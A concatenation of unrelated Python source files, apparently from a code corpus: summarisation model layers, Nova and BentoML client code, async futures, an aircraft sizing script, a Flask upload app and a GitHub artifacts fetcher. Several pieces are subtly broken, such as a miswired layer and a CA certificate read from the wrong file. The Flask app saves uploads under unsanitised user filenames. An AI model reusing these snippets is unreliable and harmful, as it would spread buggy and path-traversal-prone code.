h = self.relu(h) h = self.dropout(h) h = self.linear2(h).squeeze(-1) sent_scores = self.softmax(h) * mask_cls.float() # batch_size,decode_step,ext_size max_score=torch.zeros([sent_scores.size(0),sent_scores.size(-1)],dtype=torch.float).to(x.device).unsqueeze(-1) # print(sent_scores.size()) # print(max_score.size()) index = torch.arange(0,sent_scores.size(-1),dtype=torch.float).unsqueeze(0).expand(sent_scores.size(0),-1).to(x.device).unsqueeze(-1) final_score=[] for i in range(0, sent_scores.size(1)): score_step=sent_scores.select(1,i).unsqueeze(-1) # print(index.size(),score_step.size(),max_score.size()) score_step_concat=torch.cat([index,score_step,max_score],dim=-1) # print(score_step_concat.size()) score_step=self.linear4(self.dropout(self.relu(self.linear3(score_step_concat)))) 
score_step = (self.softmax(score_step.squeeze(-1)) * mask_cls.float()).unsqueeze(-1) # print(score_step.size()) final_score.append(score_step) max_score=torch.where(max_score>score_step,max_score,score_step) sent_scores=torch.stack(final_score,dim=1).squeeze(-1) # sent_scores = self.softmax(sent_scores) * mask_cls.float() return sent_scores def forward(self, x, mask_cls): h = self.linear1(x) h = self.relu(h) h = self.dropout(h) h = self.linear2(h).squeeze(-1) sent_scores=h # sent_scores = self.softmax(h) * mask_cls.float() # batch_size,decode_step,ext_size max_score = torch.zeros([sent_scores.size(0), sent_scores.size(-1)], dtype=torch.float).to(x.device) # print(sent_scores.size()) # print(max_score.size()) index = torch.arange(0, sent_scores.size(-1), dtype=torch.float).unsqueeze(0).unsqueeze(0).expand(sent_scores.size(0),sent_scores.size(1), -1).to(x.device) index[index > 0] = 1 max_scores = [max_score] # print(sent_scores.size()) for i in range(1, sent_scores.size(1)): # print(sent_scores[:, :i, :]) # print(torch.max(sent_scores[:, :i, :], dim=1)) sent_score_before = torch.max(sent_scores[:, :i, :], dim=1)[0] max_scores.append(sent_score_before) max_scores=torch.stack(max_scores,dim=1) score_step_concat = torch.cat([index.unsqueeze(-1), sent_scores.unsqueeze(-1), (1-max_scores).unsqueeze(-1)], dim=-1) # final_score = self.linear4(self.dropout(self.relu(self.linear3(score_step_concat)))).squeeze(-1) final_score = self.linear4(score_step_concat).squeeze(-1) sent_scores = self.softmax(final_score) * mask_cls.float() return sent_scores def predict(self,x, mask_cls,max_score): h = self.linear1(x) h = self.relu(h) h = self.dropout(h) h = self.linear2(h).squeeze(-1) sent_scores = h # sent_scores = self.softmax(h) * mask_cls.float() # batch_size,decode_step,ext_size index = torch.arange(0, sent_scores.size(-1),dtype=torch.float).unsqueeze(0).expand(sent_scores.size(0),-1).to(x.device) index[index>0]=1 # print(max_score.size(),index.size(),sent_scores.size()) score_step_concat = torch.cat([index.unsqueeze(-1), sent_scores.unsqueeze(-1), (1-max_score)],dim=-1) # final_score = self.linear4(self.dropout(self.relu(self.linear3(score_step_concat)))) final_score = self.linear4(score_step_concat) # print(max_score.size(),sent_scores.size()) max_score = torch.where(max_score > sent_scores.unsqueeze(-1), max_score, sent_scores.unsqueeze(-1)) sent_scores = self.softmax(final_score.squeeze(-1)) * mask_cls.float() return sent_scores,max_score def predict_old(self,x, mask_cls,max_score): h = self.linear1(x) h = self.relu(h) h = self.dropout(h) h = self.linear2(h).squeeze(-1) sent_scores = self.softmax(h) * mask_cls.float() # batch_size,decode_step,ext_size index = torch.arange(0, sent_scores.size(-1),dtype=torch.float).unsqueeze(0).expand(sent_scores.size(0),-1).to(x.device) # print(max_score.size(),index.size(),sent_scores.size()) score_step_concat = torch.cat([index.unsqueeze(-1), sent_scores.unsqueeze(-1), max_score],dim=-1) score_step = self.linear4(self.dropout(self.relu(self.linear3(score_step_concat)))) sent_scores = self.softmax(score_step.squeeze(-1)) * mask_cls.float() max_score = torch.where(max_score > sent_scores.unsqueeze(-1), max_score, sent_scores.unsqueeze(-1)) return sent_scores,max_score class ClassifierSourceType(nn.Module): def __init__(self, hidden_size): super(ClassifierSourceType, self).__init__() self.linear1=nn.Linear(1,hidden_size) self.linear2 = nn.Linear(hidden_size*2, 1) self.sigmoid = nn.Sigmoid() def forward(self, x, mask_cls,source_type): h1 = self.linear1(source_type) h2 = 
torch.cat([x,h1],-1) h = self.linear1(h2).squeeze(-1) sent_scores = self.sigmoid(h) * mask_cls.float() return sent_scores class PositionalEncoding(nn.Module): def __init__(self, dropout, dim, max_len=5000): pe = torch.zeros(max_len, dim) position = torch.arange(0, max_len).unsqueeze(1) div_term = torch.exp((torch.arange(0, dim, 2, dtype=torch.float) * -(math.log(10000.0) / dim))) pe[:, 0::2] = torch.sin(position.float() * div_term) pe[:, 1::2] = torch.cos(position.float() * div_term) pe = pe.unsqueeze(0) super(PositionalEncoding, self).__init__() self.register_buffer('pe', pe) self.dropout = nn.Dropout(p=dropout) self.dim = dim def forward(self, emb, step=None): emb = emb * math.sqrt(self.dim) try: # print(self.pe) # print(step) x=torch.index_select(self.pe,1,step).squeeze(0).unsqueeze(1) # print('emb:',emb.size()) # print(torch.index_select(self.pe,1,step).size()) # print(self.pe[:, 1].size()) emb = emb + x # print(emb.size()) except Exception as e: # print(e) if(step): emb = emb + self.pe[:, step][:, None, :] else: emb = emb + self.pe[:, :emb.size(1)] emb = self.dropout(emb) return emb def get_emb(self, emb): return self.pe[:, :emb.size(1)] class TransformerEncoderLayer(nn.Module): def __init__(self, d_model, heads, d_ff, dropout): super(TransformerEncoderLayer, self).__init__() self.self_attn = MultiHeadedAttention( heads, d_model, dropout=dropout) self.feed_forward = PositionwiseFeedForward(d_model, d_ff, dropout) self.layer_norm = nn.LayerNorm(d_model, eps=1e-6) self.dropout = nn.Dropout(dropout) def forward(self, iter, query, inputs, mask): if (iter != 0): input_norm = self.layer_norm(inputs) else: input_norm = inputs mask = mask.unsqueeze(1) context,_ = self.self_attn(input_norm, input_norm, input_norm, mask=mask) out = self.dropout(context) + inputs return self.feed_forward(out) class ExtTransformerEncoder(nn.Module): def __init__(self, d_model, d_ff, heads, dropout, num_inter_layers=0): super(ExtTransformerEncoder, self).__init__() self.d_model = d_model self.num_inter_layers = num_inter_layers self.pos_emb = PositionalEncoding(dropout, d_model) self.transformer_inter = nn.ModuleList( [TransformerEncoderLayer(d_model, heads, d_ff, dropout) for _ in range(num_inter_layers)]) self.dropout = nn.Dropout(dropout) self.layer_norm = nn.LayerNorm(d_model, eps=1e-6) self.wo = nn.Linear(d_model, 1, bias=True) self.sigmoid = nn.Sigmoid() def forward(self, top_vecs, mask): """ See :obj:`EncoderBase.forward()`""" batch_size, n_sents = top_vecs.size(0), top_vecs.size(1) pos_emb = self.pos_emb.pe[:, :n_sents] x = top_vecs * mask[:, :, None].float() x = x + pos_emb for i in range(self.num_inter_layers): x = self.transformer_inter[i](i, x, x, ~mask) # x = self.transformer_inter[i](i, x, x, 1 - mask) # all_sents * max_tokens * dim x = self.layer_norm(x) sent_scores = self.sigmoid(self.wo(x)) sent_scores = sent_scores.squeeze(-1) * mask.float() return sent_scores class ExtTransformerEncoderSourceType(nn.Module): def __init__(self, d_model, d_ff, heads, dropout, num_inter_layers=0): super(ExtTransformerEncoderSourceType, self).__init__() self.d_model = d_model self.num_inter_layers = num_inter_layers self.pos_emb = PositionalEncoding(dropout, d_model) self.transformer_inter = nn.ModuleList( [TransformerEncoderLayer(d_model, heads, d_ff, dropout) for _ in range(num_inter_layers)]) self.dropout = nn.Dropout(dropout) self.layer_norm = nn.LayerNorm(d_model, eps=1e-6) self.ls = nn.Embedding(6,d_model) self.wo = nn.Linear(d_model*2, 1, bias=True) self.sigmoid = nn.Sigmoid() def forward(self, top_vecs, 
                mask, source_type):
        """ See :obj:`EncoderBase.forward()`"""
        batch_size, n_sents = top_vecs.size(0), top_vecs.size(1)
        pos_emb = self.pos_emb.pe[:, :n_sents]
        x = top_vecs * mask[:, :, None].float()
        x = x + pos_emb
        for i in range(self.num_inter_layers):
            x = self.transformer_inter[i](i, x, x, ~mask)
            # x = self.transformer_inter[i](i, x, x, 1 - mask)  # all_sents * max_tokens * dim
        x = self.layer_norm(x)
        h1 = self.ls(source_type)
        sent_scores = self.sigmoid(self.wo(torch.cat([x, h1], -1)))
        sent_scores = sent_scores.squeeze(-1) * mask.float()
        return sent_scores
<gh_stars>0
import pandas as pd
import plotly.express as px

f = pd.read_csv('csv files/data.csv')
graph = px.scatter(f, x="Population", y="Per capita", size="Percentage", color="Country")
graph.show()
<filename>nova/objects/hv_spec.py<gh_stars>0
# Copyright (c) 2014 Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.

from oslo_utils import versionutils

from nova.compute import hv_type
from nova.objects import base
from nova.objects import fields


@base.NovaObjectRegistry.register
class HVSpec(base.NovaObject):
    # Version 1.0: Initial version
    # Version 1.1: Added 'vz' hypervisor
    # Version 1.2: Added 'lxd' hypervisor
    VERSION = '1.2'

    fields = {
        'arch': fields.ArchitectureField(),
        'hv_type': fields.HVTypeField(),
        'vm_mode': fields.VMModeField(),
    }

    # NOTE(pmurray): for backward compatibility, the supported instance
    # data is stored in the database as a list.
    @classmethod
    def from_list(cls, data):
        return cls(arch=data[0],
                   hv_type=data[1],
                   vm_mode=data[2])

    def to_list(self):
        return [self.arch, self.hv_type, self.vm_mode]

    def obj_make_compatible(self, primitive, target_version):
        super(HVSpec, self).obj_make_compatible(primitive, target_version)
        target_version = versionutils.convert_version_to_tuple(target_version)
        if (target_version < (1, 1) and 'hv_type' in primitive and
                hv_type.VIRTUOZZO == primitive['hv_type']):
            primitive['hv_type'] = hv_type.PARALLELS
<filename>py/garage/garage/asyncs/futures.py
"""
Future objects that represent one-shot caller-callee contract.

A caller will hold a Future object and its callee will hold a Promise object.

Direct caller-callee relationship where a caller has direct reference to its
callee should be modelled by normal function call or task spawning.  Future
objects should be for indirect caller-callee relationship; for example, a
caller submits jobs to a worker pool and cannot be certain which worker will
be performing the job, and in this case we should use Future objects to model
the caller-callee relationship.
"""

__all__ = [
    'CancelledError',
    'DeferredFuture',
    'Future',
    'FutureAdapter',
]

from concurrent.futures import CancelledError
import enum

import curio.traps

from garage.assertions import ASSERT

from . import base


class State(enum.Enum):
    PENDING = 'PENDING'
    RUNNING = 'RUNNING'
    CANCELLED = 'CANCELLED'
    FINISHED = 'FINISHED'


class Future:
    """Future object, which is for the caller-side of the contract.

    NOTE: The interface of Future class is still different from that of
    concurrent.futures.Future, but we try to make them as close as
    possible/practical.
    """

    # You should not construct Promise objects directly, and should call
    # Future.make_promise to get Promise objects.
    class Promise:
        """Promise object, which is for the callee-side of the contract.

        NOTE: Interface of the Promise object is not asynchronous; meaning
        that you may use it outside of an event loop (say, in a work thread
        performing blocking operations).
        """

        def __init__(self, future):
            self._future = future

        #
        # Use context manager to express promise holder's intent to:
        # * Start working on the job
        # * Capture exception automatically
        #
        # The usage is usually like:
        #     try:
        #         with promise:
        #             promise.set_result(...)
        #     except futures.CancelledError:
        #         pass
        #     except Exception:
        #         ...
# Log error # async def __aenter__(self): return self.__enter__() async def __aexit__(self, *args): return self.__exit__(*args) def __enter__(self): if not self.set_running_or_notify_cancel(): raise CancelledError return self def __exit__(self, exc_type, exc, tb): # This is subtly annoying: If after set_result() and before # leaving the block, an exception is raised, it will not be # captured because the promise has been fulfilled already. # Anyway, if you always do promise.set_result() at the very # end, you should be fine. if exc_type: if (not self._future.done() and # We should only capture "true" errors (not issubclass(exc_type, BaseException) or issubclass(exc_type, Exception))): self.set_exception(exc) # Although the exception is captured, to be consistent # on all code paths we will not suppress the exception, # i.e., don't return True here else: if not self._future.done(): import warnings warnings.warn('promise has not been fulfilled: %r' % self) # It's usually a good idea that you check whether the job has # been cancelled before starting it. def set_running_or_notify_cancel(self): if self._future._state is State.CANCELLED: return False elif self._future._state is State.PENDING: self._future._state = State.RUNNING return True else: raise AssertionError( 'Future is in unexpected state: %r' % self._future._state) def cancelled(self): return self._future.cancelled() def _set(self, result, exception): if self._future._state is State.CANCELLED: return ASSERT.is_not(self._future._state, State.FINISHED) ASSERT.false(self._future.done()) ASSERT.false(self._future._done.is_set()) self._future._result = result self._future._exception = exception self._future._state = State.FINISHED self._future._done.set() def set_result(self, result): self._set(result, None) def set_exception(self, exception): self._set(None, exception) def __init__(self): # Set when state is transition to CANCELED or FINISHED self._done = base.Event() self._state = State.PENDING self._result = None self._exception = None # Use the context manager to express that the future holder doesn't # care about the result once he leaves this block async def __aenter__(self): return self async def __aexit__(self, *_): self.cancel() def running(self): return self._state is State.RUNNING def cancelled(self): return self._state is State.CANCELLED def done(self): return self._state in (State.CANCELLED, State.FINISHED) def promise(self): # Future won't reference to Promise to avoid cyclic reference. return Future.Promise(self) def cancel(self): """Notify the Promise holder that the Future holder is not interested in the result anymore. Return True if the future is/was actually cancelled. """ if self._state is State.PENDING: self._state = State.CANCELLED self._done.set() return True elif self._state is State.RUNNING: return False elif self._state is State.CANCELLED: ASSERT.true(self._done.is_set()) return True else: ASSERT.is_(self._state, State.FINISHED) ASSERT.true(self._done.is_set()) return False async def result(self): await self._done.wait() ASSERT.true(self.done()) if self._state is State.CANCELLED: raise CancelledError elif self._exception is not None: raise self._exception else: return self._result async def exception(self): await self._done.wait() ASSERT.true(self.done()) if self._state is State.CANCELLED: raise CancelledError else: return self._exception class FutureAdapter: """An asynchronous interface adapter for a concurrent.futures.Future objects. 
""" def __init__(self, future): self._future = future async def __aenter__(self): return self async def __aexit__(self, *_): self.cancel() def running(self): return self._future.running() def cancelled(self): return self._future.cancelled() def done(self): return self._future.done() def cancel(self): return self._future.cancel() async def result(self): if not self._future.done(): await curio.traps._future_wait(self._future) return self._future.result() async def exception(self): if not self._future.done(): await curio.traps._future_wait(self._future) return self._future.exception() class DeferredFuture: """Represent deferred computation. Unlike Future, DeferredFuture is not for split work across tasks, as it execute the computation on the same task, but is designed for two purposes: * Defer and evaluate a computation lazily (duh!). * You want to provide Future-esque interface but do not want to spawn and manage new tasks. """ @classmethod def wrap(cls, coro_func): """Wrap a coroutine function (a function that generates coroutine, not a coroutine itself) that whenever the wrapper is called, a DeferredFuture is returned. """ def wrapper(*args, **kwargs): return cls(coro_func, args, kwargs) return wrapper def __init__(self, coro_func, args, kwargs): self._coro_func = coro_func self._args = args self._kwargs = kwargs self._state = State.PENDING self._result = None self._exception = None async def __aenter__(self): return self async def __aexit__(self, *_): self.cancel() def running(self): return self._state is State.RUNNING def cancelled(self): return self._state is State.CANCELLED def done(self): return self._state in (State.CANCELLED, State.FINISHED) def cancel(self): if self._state is State.PENDING: self._state = State.CANCELLED return True elif self._state is State.RUNNING: return False elif self._state is State.CANCELLED: return True else: ASSERT.is_(self._state, State.FINISHED) return False async def result(self): if not self.done(): await self._evaluate() if self._exception is not None: raise self._exception else: return self._result async def exception(self): if not self.done(): await self._evaluate() return self._exception async def _evaluate(self): ASSERT.is_(self._state, State.PENDING) self._state = State.RUNNING try: self._result = await self._coro_func(*self._args, **self._kwargs) except Exception as e: self._exception = e finally: self._state = State.FINISHED <filename>py_tdlib/constructors/log_stream_empty.py from ..factory import Type class logStreamEmpty(Type): pass from animations.animation_tape import AnimationTape class AnimationSetting: def __init__(self, tape: AnimationTape, repeat_time: int) -> None: self._tape = tape self._repeat_time = repeat_time @property def tape(self) -> AnimationTape: return self._tape @property def repeat_time(self) -> int: return self._repeat_time #!/usr/bin/env python3 # -*- coding:utf-8 -*- ################################################################################## # File: c:\Projects\KENYA ONE PROJECT\CORE\engines\constraint.py # # Project: c:\Projects\KENYA ONE PROJECT\CORE\engines # # Created Date: Thursday, January 9th 2020, 8:56:55 pm # # Author: <NAME> ( <<EMAIL>> ) # # ----- # # Last Modified: Thursday January 9th 2020 8:56:55 pm # # Modified By: <NAME> ( <<EMAIL>> ) # # ----- # # MIT License # # # # Copyright (c) 2020 KENYA ONE PROJECT # # # # Permission is hereby granted, free of charge, to any person obtaining a copy of# # this software and associated documentation files (the "Software"), to deal in # # the Software without 
restriction, including without limitation the rights to # # use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies # # of the Software, and to permit persons to whom the Software is furnished to do # # so, subject to the following conditions: # # # # The above copyright notice and this permission notice shall be included in all # # copies or substantial portions of the Software. # # # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # # SOFTWARE. # # ----- # # Copyright (c) 2020 KENYA ONE PROJECT # ################################################################################## import sys sys.path.append("../") from CORE.API.db_API import write_to_db, read_from_db import numpy as np # type: ignore import matplotlib.pylab as plt # type: ignore a = np.arange(50) ws = np.arange(10, 35, 0.01) cdmin: float = 0.025 write_to_db("cdMin", cdmin) do = read_from_db("rhoSL") dalt = read_from_db("altitudeDensity") # AAAAA k = read_from_db("k") # v = read_from_db('cruiseSpeed') * 1.688 v: float = 140 * 1.688 # AAAAA qcruise = 0.5 * dalt * v ** 2 # dynamic pressure at cruise qtakeoff = 0.5 * do * v ** 2 # dynamic pressure at take-off turnangle = 40 # turn angle loadfactor = 1 / (np.cos(turnangle)) # loadfactor twturn = ( qcruise * ((cdmin / ws) + (k * (loadfactor / qcruise) ** 2) * ws) * (v * 5850 / (0.8 * 550 * 0.6604)) ) # rate of climb roc = read_from_db("rateOfClimb") * 3.28 * 60 # rate of climb ft/min #AAAAAAA # Vy=sqrt((2/do)*ws * sqrt( k/(3*cdmin) )) Vy = 150 Vv = roc / 60 qclimb = 0.5 * do * (Vy ** 2) twclimb = ( (Vv / Vy) + ((qclimb / ws) * cdmin) + ((qclimb / ws) * cdmin) + ((k / qclimb) * ws) ) * (Vy * 5850 / (0.6 * 550)) # ground run Sg: int = 1000 # ground run ft Vlof: float = 70 * 1.688 clto: float = 1.4670 u: float = 0.04 cdto = 0.03 q1 = 0.5 * do * (Vlof / np.sqrt(2)) ** 2 twtakeoff = ( ((Vlof ** 2) / (2 * 32.174 * Sg)) + ((q1 * cdto) / ws) + u * (1 - (q1 * clto / ws)) ) * (Vlof * 5850 / (0.6 * 550)) # cruise altitude twcruise = (((qcruise * cdmin) / ws) + ((k / qcruise) * ws)) * ( v * 5850 / (0.6 * 550 * 0.6604) ) # service ceiling twservceiling = ( (1.668 / np.sqrt((2 * ws / dalt) * np.sqrt(k / (3 * cdmin)))) + (4 * np.sqrt(k * cdmin / 3)) ) * ((v * 5850) / (0.7 * 550 * 0.6604)) plt.plot(ws, twclimb, label="climb") plt.plot(ws, twturn, label="turn") plt.plot(ws, twtakeoff, label="Takeoff") plt.plot(ws, twservceiling, label="Service Ceiling") plt.plot(ws, twcruise, label="cruise") plotWS = read_from_db("WS") plt.axvline(x=plotWS) ################################ plt.legend(loc="upper left") if __name__ == "__main__": plt.show() def find_nearest(array, value): idx = (np.abs(array - value)).argmin() return idx # print(find_nearest(ws, plotWS)) myidx = find_nearest(ws, plotWS) # cruiseidx = (twcruise[myidx]) # takeoffidx = twtakeoff[myidx] # climbidx = twclimb[myidx] # turnidx = twturn[myidx] # ceilingidx = twservceiling[myidx] # print([cruiseidx,takeoffidx,climbidx,turnidx,ceilingidx]) def point(): cruiseidx = twcruise[myidx] takeoffidx = twtakeoff[myidx] climbidx = twclimb[myidx] turnidx = twturn[myidx] ceilingidx = twservceiling[myidx] # 
print([cruiseidx,takeoffidx,climbidx,turnidx,ceilingidx]) # print (cruiseidx,"cruiseidx") x = np.array([cruiseidx, takeoffidx, climbidx, turnidx, ceilingidx]) idx = x.argmax() return x[idx] finalBHP = point() # print ( finalBHP,"BHP") write_to_db("finalBHP", finalBHP) S = (read_from_db("finalMTOW")) / (plotWS * 10.57) write_to_db("S", S) <gh_stars>0 from django.urls import path from .views import BookDetailView, BookListView app_name = 'books' urlpatterns = [ path('', BookListView.as_view(), name='list'), path('<int:pk>/', BookDetailView.as_view(), name='detail') ]import unittest from openVulnQuery import constants IPS_SIGNATURE_LABEL = 'ips_signatures' API_LABELS = ( 'advisory_id', 'advisory_title', 'bug_ids', 'cves', 'cvrf_url', 'cvss_base_score', 'cwe', 'first_fixed', 'first_published', 'ios_release', IPS_SIGNATURE_LABEL, 'last_updated', 'oval_url', 'product_names', 'publication_url', 'sir', 'summary', ) IPS_SIGNATURES = ( 'legacy_ips_id', 'legacy_ips_url', 'release_version', 'software_version', ) ALLOWS_FILTER = ( 'all', 'severity', ) NA_INDICATOR = 'NA' JSON_OUTPUT_FORMAT_TOKEN = 'json' CSV_OUTPUT_FORMAT_TOKEN = 'csv' CVRF_ADVISORY_FORMAT_TOKEN = '<PASSWORD>' OVAL_ADVISORY_FORMAT_TOKEN = '<PASSWORD>' IOS_ADVISORY_FORMAT_TOKEN = 'ios' ADVISORY_FORMAT_TOKENS = ( CVRF_ADVISORY_FORMAT_TOKEN, OVAL_ADVISORY_FORMAT_TOKEN, IOS_ADVISORY_FORMAT_TOKEN, ) class ConstantsTest(unittest.TestCase): def test_constants_unchanged_na_indicator(self): self.assertEqual(constants.NA_INDICATOR, NA_INDICATOR) def test_constants_filters_available(self): self.assertEqual(constants.ALLOWS_FILTER, ALLOWS_FILTER) def test_constants_unchanged_advisory_tokens(self): self.assertEqual( constants.ADVISORY_FORMAT_TOKENS, ADVISORY_FORMAT_TOKENS) def test_constants_unchanged_json_format_token(self): self.assertEqual( constants.JSON_OUTPUT_FORMAT_TOKEN, JSON_OUTPUT_FORMAT_TOKEN) def test_constants_unchanged_csv_format_token(self): self.assertEqual( constants.CSV_OUTPUT_FORMAT_TOKEN, CSV_OUTPUT_FORMAT_TOKEN) def test_constants_unchanged_cvrf_advisory_format_token(self): self.assertEqual( constants.CVRF_ADVISORY_FORMAT_TOKEN, CVRF_ADVISORY_FORMAT_TOKEN) def test_constants_unchanged_oval_advisory_format_token(self): self.assertEqual( constants.OVAL_ADVISORY_FORMAT_TOKEN, OVAL_ADVISORY_FORMAT_TOKEN) def test_constants_unchanged_ios_advisory_format_token(self): self.assertEqual( constants.IOS_ADVISORY_FORMAT_TOKEN, IOS_ADVISORY_FORMAT_TOKEN) def test_constants_unchanged_ips_signature_label(self): self.assertEqual(constants.IPS_SIGNATURE_LABEL, IPS_SIGNATURE_LABEL) def test_constants_api_labels_is_non_empty_tuple(self): self.assertTrue(isinstance(constants.API_LABELS, tuple)) self.assertTrue(constants.API_LABELS) def test_constants_unique_api_labels(self): api_labels = sorted(constants.API_LABELS) api_labels_unique = sorted(set(api_labels)) self.assertEqual(api_labels, api_labels_unique) import re from flask import Flask, render_template, request from keras.preprocessing.image import load_img from keras.preprocessing.image import img_to_array from keras.applications.vgg16 import preprocess_input from keras.applications.vgg16 import decode_predictions from keras.applications.vgg16 import VGG16 app = Flask(__name__) @app.route('/',methods=['GET']) # def hello_world(): # return render_template('index.html') @app.route('/', methods=['POST']) def predict(): if request.method == 'POST': image_file = request.files.get('imagefile') image_path = "./images/" + image_file.filename image_file.save(image_path) return 
render_template('index.html') else: return render_template('index.html') if __name__ == "__main__": app.run(port=3000, debug=True)# import logging # from typing import TYPE_CHECKING, Optional # # from ..utils import cached_property # from .bento_repository_api import BentoRepositoryAPIClient # # if TYPE_CHECKING: # from .proto.yatai_service_pb2_grpc import YataiStub # # logger = logging.getLogger(__name__) from typing import TYPE_CHECKING, Optional if TYPE_CHECKING: from bentoml._internal.yatai_client.proto.yatai_service_pb2_grpc import YataiStub import logging from simple_di import inject from bentoml._internal.utils import cached_property from bentoml._internal.yatai_client.bento_repository_api import BentoRepositoryAPIClient from bentoml._internal.yatai_client.deployment_api import DeploymentAPIClient from bentoml._internal.yatai_client.utils import parse_grpc_url logger = logging.getLogger(__name__) class YataiClient: """ Python Client for interacting with YataiService """ def __init__(self, yatai_server_name: str): self._yatai_service = get_yatai_service() self.bundle_api_client = None self.deploy_api_client = None @cached_property def bundles(self) -> BentoRepositoryAPIClient: return BentoRepositoryAPIClient(self._yatai_service) @cached_property def deployment(self) -> DeploymentAPIClient: return DeploymentAPIClient(self._yatai_service) # def __init__(self, yatai_service: Optional["YataiStub"] = None): # self.yatai_service = yatai_service if yatai_service else get_yatai_service() # self.bento_repository_api_client = None # self.deployment_api_client = None # # @cached_property # def repository(self) -> "BentoRepositoryAPIClient": # return BentoRepositoryAPIClient(self.yatai_service) def get_yatai_client(yatai_url: Optional[str] = None) -> YataiClient: """ Args: yatai_url (`str`): Yatai Service URL address. Returns: :obj:`~YataiClient`, a python client to interact with :obj:`Yatai` gRPC server. 
Example:: from bentoml.yatai.client import get_yatai_client custom_url = 'https://remote.yatai:50050' yatai_client = get_yatai_client(custom_url) """ # yatai_service = get_yatai_service(channel_address=yatai_url) # return YataiClient(yatai_service=yatai_service) @inject def get_yatai_service( channel_address: str, access_token: str, access_token_header: str, tls_root_ca_cert: str, tls_client_key: str, tls_client_cert: str, ) -> "YataiStub": import certifi import grpc from bentoml._internal.yatai_client.interceptor import header_client_interceptor from bentoml._internal.yatai_client.proto.yatai_service_pb2_grpc import YataiStub channel_address = channel_address.strip() schema, addr = parse_grpc_url(channel_address) header_adder_interceptor = header_client_interceptor.header_adder_interceptor( access_token_header, access_token ) if schema in ("grpc", "https"): tls_root_ca_cert = tls_root_ca_cert or certifi.where() with open(tls_client_cert, "rb") as fb: ca_cert = fb.read() if tls_client_key: with open(tls_client_key, "rb") as fb: tls_client_key = fb.read() if tls_client_cert: with open(tls_client_cert, "rb") as fb: tls_client_cert = fb.read() credentials = grpc.ssl_channel_credentials( root_certificates=ca_cert, private_key=tls_client_key, certificate_chain=tls_client_cert, ) channel = grpc.secure_channel(addr, credentials) else: channel = grpc.insecure_channel(addr) return YataiStub(grpc.intercept_channel(channel, header_adder_interceptor)) #!/usr/bin/env python3 import sys import os import json import fnmatch import hashlib import tempfile import time import shutil import requests import jsonschema import pathlib from datetime import datetime, timedelta from io import BytesIO from zipfile import ZipFile from urllib.request import urlopen # Only add artifacts that validate from spliced.schemas import spliced_result_schema here = os.environ.get("GITHUB_WORKSPACE") or os.getcwd() ################################################################################ # Helper Functions ################################################################################ def get_envar(name): """ Given a name, return the corresponding environment variable. Exit if not defined, as using this function indicates the envar is required. Parameters: name (str): the name of the environment variable """ value = os.environ.get(name) if not value: sys.exit("%s is required." % name) return value def abort_if_fail(response, reason): """If PASS_ON_ERROR, don't exit. Otherwise exit with an error and print the reason. Parameters: response (requests.Response) : an unparsed response from requests reason (str) : a message to print to the user for fail. """ message = "%s: %s: %s\n %s" % ( reason, response.status_code, response.reason, response.json(), ) if os.environ.get("PASS_ON_ERROR"): print("Error, but PASS_ON_ERROR is set, continuing: %s" % message) else: sys.exit(message) def set_env(name, value): """helper function to echo a key/value pair to the environement file Parameters: name (str) : the name of the environment variable value (str) : the value to write to file """ environment_file_path = os.environ.get("GITHUB_ENV") with open(environment_file_path, "a") as environment_file: environment_file.write("%s=%s" % (name, value)) def get_file_hash(filepath, algorithm="sha256"): """return an md5 hash of the file based on a criteria level. This is intended to give the file a reasonable version. 
Parameters ========== image_path: full path to the singularity image """ try: hasher = getattr(hashlib, algorithm)() except AttributeError: sys.exit("%s is an invalid algorithm." % algorithm) with open(filepath, "rb") as f: for chunk in iter(lambda: f.read(4096), b""): hasher.update(chunk) return hasher.hexdigest() def get_creation_timestamp(filename): """Get creation timestamp for a file""" filen = pathlib.Path(filename) assert filen.exists() return filen.stat().st_ctime def get_size(filename): filen = pathlib.Path(filename) assert filen.exists() return filen.stat().st_size ################################################################################ # Global Variables (we can't use GITHUB_ prefix) ################################################################################ API_VERSION = "v3" BASE = "https://api.github.com" HEADERS = { "Authorization": "token %s" % get_envar("INPUT_TOKEN"), "Accept": "application/vnd.github.%s+json;application/vnd.github.antiope-preview+json;application/vnd.github.shadow-cat-preview+json" % API_VERSION, } # used to calculate if something is too old to parse today = datetime.now() # URLs repository = os.environ.get("INPUT_REPOSITORY") or os.environ.get("GITHUB_REPOSITORY") if not repository: sys.exit("GITHUB_REPOSITORY is required!") print(repository) REPO_URL = "%s/repos/%s" % (BASE, repository) ARTIFACTS_URL = "%s/actions/artifacts" % REPO_URL # If we have a run ID in the environment, scope to that RUN_ID = os.environ.get("INPUT_RUNID") if RUN_ID: ARTIFACTS_URL = "%s/actions/runs/%s/artifacts" % (REPO_URL, RUN_ID) print(ARTIFACTS_URL) def get_artifacts(repository, days=2): """ Retrieve artifacts for a repository. """ # Check if the branch already has a pull request open results = [] page = 1 while True: params = {"per_page": 100, "page": page} response = requests.get(ARTIFACTS_URL, params=params, headers=HEADERS) print("Retrieving page %s for %s" % (page, ARTIFACTS_URL)) while response.status_code == 403: print("API rate limit likely exceeded, sleeping for 10 minutes.") time.sleep(600) response = requests.get(ARTIFACTS_URL, params=params, headers=HEADERS) if response.status_code != 200: abort_if_fail(response, "Unable to retrieve artifacts") response = response.json() # We must break if found results > days old, otherwise we will continue # and use up our API key! artifacts = response["artifacts"] if any([older_than(x, days) for x in artifacts]): print("Results are older than %s days, stopping query." 
